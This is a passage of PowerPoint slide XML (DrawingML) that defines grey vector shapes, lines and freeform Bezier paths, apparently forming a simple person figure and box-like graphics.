                              <a:pt x="2218" y="1224"/>
                              <a:pt x="2193" y="1182"/>
                              <a:pt x="2180" y="1133"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="2180" y="971"/>
                              <a:pt x="2180" y="971"/>
                              <a:pt x="2180" y="971"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="2196" y="898"/>
                              <a:pt x="2230" y="823"/>
                              <a:pt x="2282" y="753"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="2342" y="675"/>
                              <a:pt x="2415" y="618"/>
                              <a:pt x="2489" y="585"/>
                            </a:cubicBezTo>
                            <a:lnTo>
                              <a:pt x="309" y="0"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="bg1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94" name="Line 43"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm flipH="1" flipV="1">
                        <a:off x="4613" y="2057"/>
                        <a:ext cx="364" cy="97"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="6350">
                        <a:solidFill>
                          <a:schemeClr val="bg1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95" name="Line 44"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm flipH="1" flipV="1">
                        <a:off x="4268" y="2150"/>
                        <a:ext cx="363" cy="97"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="6350">
                        <a:solidFill>
                          <a:schemeClr val="bg1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96" name="Line 45"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm flipH="1" flipV="1">
                        <a:off x="4786" y="2010"/>
                        <a:ext cx="364" cy="98"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="6350">
                        <a:solidFill>
                          <a:schemeClr val="bg1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97" name="Line 46"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm flipH="1" flipV="1">
                        <a:off x="4441" y="2103"/>
                        <a:ext cx="363" cy="98"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="6350">
                        <a:solidFill>
                          <a:schemeClr val="bg1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98" name="Line 47"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm flipH="1" flipV="1">
                        <a:off x="4095" y="2196"/>
                        <a:ext cx="363" cy="98"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="6350">
                        <a:solidFill>
                          <a:schemeClr val="bg1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280" name="Group 48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1285" y="2595"/>
                    <a:ext cx="398" cy="422"/>
                    <a:chOff x="1285" y="2595"/>
                    <a:chExt cx="398" cy="422"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="281" name="Freeform 49"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1500" y="2608"/>
                      <a:ext cx="183" cy="352"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 385 w 385"/>
                        <a:gd name="T1" fmla="*/ 0 h 740"/>
                        <a:gd name="T2" fmla="*/ 385 w 385"/>
                        <a:gd name="T3" fmla="*/ 636 h 740"/>
                        <a:gd name="T4" fmla="*/ 0 w 385"/>
                        <a:gd name="T5" fmla="*/ 740 h 740"/>
                        <a:gd name="T6" fmla="*/ 0 w 385"/>
                        <a:gd name="T7" fmla="*/ 260 h 740"/>
                        <a:gd name="T8" fmla="*/ 385 w 385"/>
                        <a:gd name="T9" fmla="*/ 0 h 74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85" h="740">
                          <a:moveTo>
                            <a:pt x="385" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="385" y="636"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="740"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="260"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="385" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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2" name="Freeform 50"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1285" y="2595"/>
                      <a:ext cx="398" cy="183"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 385 w 837"/>
                        <a:gd name="T1" fmla="*/ 0 h 385"/>
                        <a:gd name="T2" fmla="*/ 0 w 837"/>
                        <a:gd name="T3" fmla="*/ 262 h 385"/>
                        <a:gd name="T4" fmla="*/ 454 w 837"/>
                        <a:gd name="T5" fmla="*/ 385 h 385"/>
                        <a:gd name="T6" fmla="*/ 837 w 837"/>
                        <a:gd name="T7" fmla="*/ 123 h 385"/>
                        <a:gd name="T8" fmla="*/ 385 w 837"/>
                        <a:gd name="T9" fmla="*/ 0 h 38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837" h="385">
                          <a:moveTo>
                            <a:pt x="385" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="262"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="385"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="837" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="385" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="6E6E6E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3" name="Freeform 51"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1285" y="2653"/>
                      <a:ext cx="182" cy="137"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 383"/>
                        <a:gd name="T1" fmla="*/ 288 h 288"/>
                        <a:gd name="T2" fmla="*/ 383 w 383"/>
                        <a:gd name="T3" fmla="*/ 26 h 288"/>
                        <a:gd name="T4" fmla="*/ 383 w 383"/>
                        <a:gd name="T5" fmla="*/ 0 h 288"/>
                        <a:gd name="T6" fmla="*/ 0 w 383"/>
                        <a:gd name="T7" fmla="*/ 262 h 288"/>
                        <a:gd name="T8" fmla="*/ 0 w 383"/>
                        <a:gd name="T9" fmla="*/ 288 h 28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83" h="288">
                          <a:moveTo>
                            <a:pt x="0" y="288"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="383" y="26"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="383" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="262"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="288"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="828282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4" name="Freeform 52"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1467" y="2719"/>
                      <a:ext cx="216" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 454 w 454"/>
                        <a:gd name="T1" fmla="*/ 123 h 149"/>
                        <a:gd name="T2" fmla="*/ 0 w 454"/>
                        <a:gd name="T3" fmla="*/ 0 h 149"/>
                        <a:gd name="T4" fmla="*/ 0 w 454"/>
                        <a:gd name="T5" fmla="*/ 26 h 149"/>
                        <a:gd name="T6" fmla="*/ 454 w 454"/>
                        <a:gd name="T7" fmla="*/ 149 h 149"/>
                        <a:gd name="T8" fmla="*/ 454 w 454"/>
                        <a:gd name="T9" fmla="*/ 123 h 14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4" h="149">
                          <a:moveTo>
                            <a:pt x="454" y="123"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="26"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="123"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="6E6E6E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5" name="Freeform 53"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1285" y="2666"/>
                      <a:ext cx="182" cy="351"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 383 w 383"/>
                        <a:gd name="T1" fmla="*/ 0 h 739"/>
                        <a:gd name="T2" fmla="*/ 383 w 383"/>
                        <a:gd name="T3" fmla="*/ 635 h 739"/>
                        <a:gd name="T4" fmla="*/ 0 w 383"/>
                        <a:gd name="T5" fmla="*/ 739 h 739"/>
                        <a:gd name="T6" fmla="*/ 0 w 383"/>
                        <a:gd name="T7" fmla="*/ 262 h 739"/>
                        <a:gd name="T8" fmla="*/ 383 w 383"/>
                        <a:gd name="T9" fmla="*/ 0 h 7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83" h="739">
                          <a:moveTo>
                            <a:pt x="383" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="383" y="635"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="739"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="262"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="383" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="828282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266" name="Group 54"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="2416" y="2670"/>
                  <a:ext cx="300" cy="624"/>
                  <a:chOff x="4077" y="1922"/>
                  <a:chExt cx="300" cy="624"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="274" name="Freeform 55"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4077" y="2004"/>
                    <a:ext cx="300" cy="254"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 186 w 226"/>
                      <a:gd name="T1" fmla="*/ 107 h 191"/>
                      <a:gd name="T2" fmla="*/ 164 w 226"/>
                      <a:gd name="T3" fmla="*/ 113 h 191"/>
                      <a:gd name="T4" fmla="*/ 154 w 226"/>
                      <a:gd name="T5" fmla="*/ 49 h 191"/>
                      <a:gd name="T6" fmla="*/ 128 w 226"/>
                      <a:gd name="T7" fmla="*/ 24 h 191"/>
                      <a:gd name="T8" fmla="*/ 85 w 226"/>
                      <a:gd name="T9" fmla="*/ 13 h 191"/>
                      <a:gd name="T10" fmla="*/ 45 w 226"/>
                      <a:gd name="T11" fmla="*/ 2 h 191"/>
                      <a:gd name="T12" fmla="*/ 15 w 226"/>
                      <a:gd name="T13" fmla="*/ 12 h 191"/>
                      <a:gd name="T14" fmla="*/ 2 w 226"/>
                      <a:gd name="T15" fmla="*/ 85 h 191"/>
                      <a:gd name="T16" fmla="*/ 2 w 226"/>
                      <a:gd name="T17" fmla="*/ 85 h 191"/>
                      <a:gd name="T18" fmla="*/ 1 w 226"/>
                      <a:gd name="T19" fmla="*/ 89 h 191"/>
                      <a:gd name="T20" fmla="*/ 1 w 226"/>
                      <a:gd name="T21" fmla="*/ 89 h 191"/>
                      <a:gd name="T22" fmla="*/ 8 w 226"/>
                      <a:gd name="T23" fmla="*/ 106 h 191"/>
                      <a:gd name="T24" fmla="*/ 23 w 226"/>
                      <a:gd name="T25" fmla="*/ 106 h 191"/>
                      <a:gd name="T26" fmla="*/ 29 w 226"/>
                      <a:gd name="T27" fmla="*/ 105 h 191"/>
                      <a:gd name="T28" fmla="*/ 29 w 226"/>
                      <a:gd name="T29" fmla="*/ 105 h 191"/>
                      <a:gd name="T30" fmla="*/ 32 w 226"/>
                      <a:gd name="T31" fmla="*/ 104 h 191"/>
                      <a:gd name="T32" fmla="*/ 38 w 226"/>
                      <a:gd name="T33" fmla="*/ 102 h 191"/>
                      <a:gd name="T34" fmla="*/ 39 w 226"/>
                      <a:gd name="T35" fmla="*/ 68 h 191"/>
                      <a:gd name="T36" fmla="*/ 36 w 226"/>
                      <a:gd name="T37" fmla="*/ 69 h 191"/>
                      <a:gd name="T38" fmla="*/ 39 w 226"/>
                      <a:gd name="T39" fmla="*/ 47 h 191"/>
                      <a:gd name="T40" fmla="*/ 38 w 226"/>
                      <a:gd name="T41" fmla="*/ 165 h 191"/>
                      <a:gd name="T42" fmla="*/ 47 w 226"/>
                      <a:gd name="T43" fmla="*/ 175 h 191"/>
                      <a:gd name="T44" fmla="*/ 98 w 226"/>
                      <a:gd name="T45" fmla="*/ 189 h 191"/>
                      <a:gd name="T46" fmla="*/ 125 w 226"/>
                      <a:gd name="T47" fmla="*/ 170 h 191"/>
                      <a:gd name="T48" fmla="*/ 125 w 226"/>
                      <a:gd name="T49" fmla="*/ 153 h 191"/>
                      <a:gd name="T50" fmla="*/ 125 w 226"/>
                      <a:gd name="T51" fmla="*/ 124 h 191"/>
                      <a:gd name="T52" fmla="*/ 123 w 226"/>
                      <a:gd name="T53" fmla="*/ 88 h 191"/>
                      <a:gd name="T54" fmla="*/ 121 w 226"/>
                      <a:gd name="T55" fmla="*/ 75 h 191"/>
                      <a:gd name="T56" fmla="*/ 121 w 226"/>
                      <a:gd name="T57" fmla="*/ 71 h 191"/>
                      <a:gd name="T58" fmla="*/ 121 w 226"/>
                      <a:gd name="T59" fmla="*/ 75 h 191"/>
                      <a:gd name="T60" fmla="*/ 123 w 226"/>
                      <a:gd name="T61" fmla="*/ 88 h 191"/>
                      <a:gd name="T62" fmla="*/ 128 w 226"/>
                      <a:gd name="T63" fmla="*/ 121 h 191"/>
                      <a:gd name="T64" fmla="*/ 129 w 226"/>
                      <a:gd name="T65" fmla="*/ 123 h 191"/>
                      <a:gd name="T66" fmla="*/ 129 w 226"/>
                      <a:gd name="T67" fmla="*/ 123 h 191"/>
                      <a:gd name="T68" fmla="*/ 129 w 226"/>
                      <a:gd name="T69" fmla="*/ 127 h 191"/>
                      <a:gd name="T70" fmla="*/ 137 w 226"/>
                      <a:gd name="T71" fmla="*/ 147 h 191"/>
                      <a:gd name="T72" fmla="*/ 151 w 226"/>
                      <a:gd name="T73" fmla="*/ 153 h 191"/>
                      <a:gd name="T74" fmla="*/ 199 w 226"/>
                      <a:gd name="T75" fmla="*/ 139 h 191"/>
                      <a:gd name="T76" fmla="*/ 186 w 226"/>
                      <a:gd name="T77" fmla="*/ 107 h 1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226" h="191">
                        <a:moveTo>
                          <a:pt x="186" y="107"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="184" y="108"/>
                          <a:pt x="175" y="110"/>
                          <a:pt x="164" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="84"/>
                          <a:pt x="155" y="57"/>
                          <a:pt x="154" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="32"/>
                          <a:pt x="136" y="27"/>
                          <a:pt x="128" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="21"/>
                          <a:pt x="98" y="16"/>
                          <a:pt x="85" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="9"/>
                          <a:pt x="54" y="3"/>
                          <a:pt x="45" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="0"/>
                          <a:pt x="18" y="4"/>
                          <a:pt x="15" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="14"/>
                          <a:pt x="8" y="50"/>
                          <a:pt x="2" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="85"/>
                          <a:pt x="2" y="85"/>
                          <a:pt x="2" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="98"/>
                          <a:pt x="3" y="104"/>
                          <a:pt x="8" y="106"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="108"/>
                          <a:pt x="17" y="107"/>
                          <a:pt x="23" y="106"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="104"/>
                          <a:pt x="31" y="104"/>
                          <a:pt x="32" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="103"/>
                          <a:pt x="36" y="103"/>
                          <a:pt x="38" y="102"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="68"/>
                          <a:pt x="39" y="68"/>
                          <a:pt x="39" y="68"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="68"/>
                          <a:pt x="37" y="69"/>
                          <a:pt x="36" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="54"/>
                          <a:pt x="39" y="44"/>
                          <a:pt x="39" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="53"/>
                          <a:pt x="38" y="122"/>
                          <a:pt x="38" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="170"/>
                          <a:pt x="41" y="175"/>
                          <a:pt x="47" y="175"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="59" y="178"/>
                          <a:pt x="91" y="188"/>
                          <a:pt x="98" y="189"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="106" y="191"/>
                          <a:pt x="122" y="181"/>
                          <a:pt x="125" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="168"/>
                          <a:pt x="125" y="155"/>
                          <a:pt x="125" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="124"/>
                          <a:pt x="125" y="124"/>
                          <a:pt x="125" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="111"/>
                          <a:pt x="124" y="99"/>
                          <a:pt x="123" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="82"/>
                          <a:pt x="122" y="78"/>
                          <a:pt x="121" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="73"/>
                          <a:pt x="121" y="72"/>
                          <a:pt x="121" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="72"/>
                          <a:pt x="121" y="73"/>
                          <a:pt x="121" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="79"/>
                          <a:pt x="123" y="83"/>
                          <a:pt x="123" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="96"/>
                          <a:pt x="126" y="107"/>
                          <a:pt x="128" y="121"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="122"/>
                          <a:pt x="129" y="122"/>
                          <a:pt x="129" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="123"/>
                          <a:pt x="129" y="123"/>
                          <a:pt x="129" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="127"/>
                          <a:pt x="129" y="127"/>
                          <a:pt x="129" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="137"/>
                          <a:pt x="134" y="143"/>
                          <a:pt x="137" y="147"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141" y="151"/>
                          <a:pt x="145" y="152"/>
                          <a:pt x="151" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="166" y="149"/>
                          <a:pt x="181" y="144"/>
                          <a:pt x="199" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="226" y="131"/>
                          <a:pt x="210" y="99"/>
                          <a:pt x="186" y="107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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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5" name="Freeform 56"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4144" y="1992"/>
                    <a:ext cx="79" cy="48"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 27 w 60"/>
                      <a:gd name="T1" fmla="*/ 34 h 36"/>
                      <a:gd name="T2" fmla="*/ 9 w 60"/>
                      <a:gd name="T3" fmla="*/ 20 h 36"/>
                      <a:gd name="T4" fmla="*/ 14 w 60"/>
                      <a:gd name="T5" fmla="*/ 11 h 36"/>
                      <a:gd name="T6" fmla="*/ 48 w 60"/>
                      <a:gd name="T7" fmla="*/ 14 h 36"/>
                      <a:gd name="T8" fmla="*/ 51 w 60"/>
                      <a:gd name="T9" fmla="*/ 26 h 36"/>
                      <a:gd name="T10" fmla="*/ 27 w 60"/>
                      <a:gd name="T11" fmla="*/ 34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0" h="36">
                        <a:moveTo>
                          <a:pt x="27" y="34"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="33"/>
                          <a:pt x="0" y="22"/>
                          <a:pt x="9" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="19"/>
                          <a:pt x="12" y="13"/>
                          <a:pt x="14" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="8"/>
                          <a:pt x="48" y="0"/>
                          <a:pt x="48" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="18"/>
                          <a:pt x="43" y="22"/>
                          <a:pt x="51" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="29"/>
                          <a:pt x="41" y="36"/>
                          <a:pt x="27" y="3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6" name="Oval 57"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4131" y="1922"/>
                    <a:ext cx="106" cy="105"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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7" name="Freeform 58"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4125" y="2221"/>
                    <a:ext cx="120" cy="325"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 89 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 10 h 245"/>
                      <a:gd name="T10" fmla="*/ 2 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 43 w 90"/>
                      <a:gd name="T17" fmla="*/ 205 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 40 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 43 w 90"/>
                      <a:gd name="T25" fmla="*/ 205 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="141"/>
                          <a:pt x="90" y="47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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="20"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="10"/>
                          <a:pt x="4" y="5"/>
                          <a:pt x="2" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="228"/>
                          <a:pt x="43" y="225"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="171"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="47"/>
                          <a:pt x="36" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="47"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
